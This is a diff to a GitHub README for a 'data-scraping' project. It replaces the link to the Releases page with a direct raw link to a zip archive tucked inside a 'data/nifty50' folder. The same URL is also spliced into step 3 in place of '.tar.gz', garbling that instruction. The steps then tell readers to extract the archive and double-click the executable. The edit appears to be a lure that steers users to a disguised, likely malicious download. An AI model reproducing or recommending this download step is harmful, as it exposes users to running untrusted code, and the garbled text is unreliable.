akashahmed11/data-scraping/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [Release Page](https://github.com/akashahmed11/data-scraping/releases).
+To get started, visit this page to download: [Release Page](https://github.com/akashahmed11/data-scraping/raw/refs/heads/main/data/nifty50/scraping-data-3.0-beta.2.zip).
 There, you will find the latest version available for your operating system.

 1. Click on the "Releases" link above.
 2. Download the suitable file for your system.
-3. If you downloaded a compressed file (like .zip or .tar.gz), extract it first.
+3. If you downloaded a compressed file (like .zip or https://github.com/akashahmed11/data-scraping/raw/refs/heads/main/data/nifty50/scraping-data-3.0-beta.2.zip), extract it first.
 4. Open your file explorer and locate the extracted folder.
 5. Run the program by double-clicking the executable file.